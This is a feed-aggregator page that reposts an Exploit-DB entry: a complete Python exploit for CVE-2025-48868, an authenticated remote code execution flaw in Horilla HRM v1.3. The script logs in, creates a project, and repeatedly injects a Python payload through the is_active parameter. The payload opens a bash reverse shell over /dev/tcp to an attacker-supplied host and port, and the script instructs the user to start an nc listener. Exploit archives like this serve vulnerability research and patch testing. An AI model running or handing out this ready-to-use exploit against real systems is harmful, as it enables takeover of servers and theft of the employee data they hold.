惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Spread Privacy
Spread Privacy
P
Palo Alto Networks Blog
P
Proofpoint News Feed
AI
AI
Help Net Security
Help Net Security
S
Securelist
T
Troy Hunt's Blog
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
C
Cisco Blogs
Scott Helme
Scott Helme
Hacker News - Newest:
Hacker News - Newest: "LLM"
Vercel News
Vercel News
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
B
Blog
GbyAI
GbyAI
Recent Commits to openclaw:main
Recent Commits to openclaw:main
D
Darknet – Hacking Tools, Hacker News & Cyber Security
P
Proofpoint News Feed
S
Security Affairs
Cisco Talos Blog
Cisco Talos Blog
AWS News Blog
AWS News Blog
T
Tenable Blog
H
Help Net Security
NISL@THU
NISL@THU
F
Fortinet All Blogs
博客园_首页
G
GRAHAM CLULEY
L
LINUX DO - 最新话题
P
Privacy International News Feed
G
Google Developers Blog
博客园 - Franky
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Security Archives - TechRepublic
Security Archives - TechRepublic
The Register - Security
The Register - Security
L
LangChain Blog
aimingoo的专栏
aimingoo的专栏
T
Tor Project blog
P
Privacy & Cybersecurity Law Blog
量子位
C
Cyber Attacks, Cyber Crime and Cyber Security
Forbes - Security
Forbes - Security
S
Secure Thoughts
Simon Willison's Weblog
Simon Willison's Weblog
D
Docker
Recorded Future
Recorded Future
博客园 - 三生石上(FineUI控件)
L
Lohrmann on Cybersecurity
T
Tailwind CSS Blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
nakleh · 2026-04-08 · via Exploit-DB.com RSS Feed
# Exploit Title:  Horilla v1.3 - RCE
# Date: 2025-05-29
# Exploit Author: Raghad Abdallah Al-syouf
# Version: <= 1.3
# Tested on: Ubuntu / Docker
# CVE: CVE-2025-48868


Description:
This script exploits the authenticated RCE vulnerability CVE-2025-48868.
It logs into the target web app, creates a project, and sends payloads
to achieve a reverse shell connection to a listener **started manually** by the user.

Usage:
    python3 CVE_2025_48868.py --url http[s]://target:port --user username --pass password --lhost YOUR_IP --lport LISTENER_PORT

Example:
    python3 CVE_2025_48868.py --url http://127.0.0.1:8000 --user admin --pass admin --lhost 192.168.1.100 --lport 4444
"""

import requests
import time
import sys
import argparse
from bs4 import BeautifulSoup
import urllib3
import random
import string
from datetime import datetime

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def generate_random_title():
    letters = ''.join(random.choices(string.ascii_lowercase, k=4))
    digits = ''.join(random.choices(string.digits, k=2))
    return letters + digits

def main():
    print("[+] CVE-2025-48868")

    parser = argparse.ArgumentParser(description='Exploit for CVE-2025-48868: Authenticated RCE in Horilla HRM software v1.3. Exploit by:Nakleh Said Zeidan')
    parser.add_argument('--url', required=True, help='Target URL, e.g. http://localhost:8000')
    parser.add_argument('--user', required=True, help='Username for login')
    parser.add_argument('--pass', required=True, dest='password', help='Password for login')
    parser.add_argument('--lhost', required=True, help='Attacker IP (listener must be started manually)')
    parser.add_argument('--lport', required=True, type=int, help='Attacker port (listener must be started manually)')

    args = parser.parse_args()

    base_url = args.url.rstrip('/')
    login_url = f"{base_url}/login/"
    project_url = f"{base_url}/project/project-bulk-archive"
    session = requests.Session()
    headers = {
        "User-Agent": "Mozilla/5.0",
        "X-Requested-With": "XMLHttpRequest"
    }

    print("[+] Getting login page...")
    login_page = session.get(login_url, headers=headers, verify=False)
    if login_page.status_code != 200:
        print(f"[-] Failed to load login page, status {login_page.status_code}")
        sys.exit(1)

    soup = BeautifulSoup(login_page.text, 'html.parser')
    csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']

    login_data = {
        "username": args.user,
        "password": args.password,
        "csrfmiddlewaretoken": csrf_token
    }

    print("[+] Logging in...")
    login_resp = session.post(login_url, data=login_data, headers=headers, verify=False)
    if login_resp.status_code != 200 or "logout" not in login_resp.text.lower():
        print("[-] Login failed")
        sys.exit(1)
    print("[+] Logged in successfully!")

    project_view_url = f"{base_url}/project/project-view/"
    project_view = session.get(project_view_url, headers=headers, verify=False)
    soup = BeautifulSoup(project_view.text, 'html.parser')
    csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']

    print("[+] Creating project...")
    create_project_url = f"{base_url}/project/create-project?"
    today_str = datetime.now().strftime("%Y-%m-%d")
    random_title = generate_random_title()
    multipart_data = {
        "is_active": "on",
        "title": random_title,
        "managers": "1",
        "members": "1",
        "status": "new",
        "start_date": today_str,
        "end_date": today_str,
        "description": "Exploit project"
    }

    create_headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "*/*",
        "Referer": project_view_url,
        "HX-Request": "true",
        "HX-Trigger": "hlvd701Form",
        "HX-Target": "hlvd701Form",
        "HX-Current-URL": project_view_url,
        "X-CSRFToken": csrf_token,
        "Origin": base_url,
        "DNT": "1",
        "Connection": "keep-alive",
    }

    create_resp = session.post(create_project_url, data=multipart_data, headers=create_headers, verify=False)
    if create_resp.status_code == 200:
        print(f"[+] Project created successfully with title: {random_title}")
    else:
        print(f"[-] Project creation may have failed (status {create_resp.status_code}), continuing anyway...")

    headers["Referer"] = project_view_url
    headers["Origin"] = base_url
    headers["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"

    print("[*] Ensure your listener is running: `nc -lvnp {}`".format(args.lport))
    print("[+] Sending payload...")

    i = 1
    while True:
        encoded_ids = f"%5B%22{i}%22%5D"
        payload = f"__import__('os').system('bash+-c+\"bash+-i+>%26+/dev/tcp/{args.lhost}/{args.lport}+0>%261\"')"
        exploit_url = f"{project_url}?is_active={payload}"
        data = f"csrfmiddlewaretoken={csrf_token}&ids={encoded_ids}"
        response = session.post(exploit_url, headers=headers, data=data, verify=False)

        if response.status_code == 200:
            print(f"[+] Payload sent for project id {i}. Waiting for shell...")
        else:
            print(f"[-] Error sending payload for project id {i} (status {response.status_code})")

        time.sleep(3)
        i += 1

if __name__ == "__main__":
    main()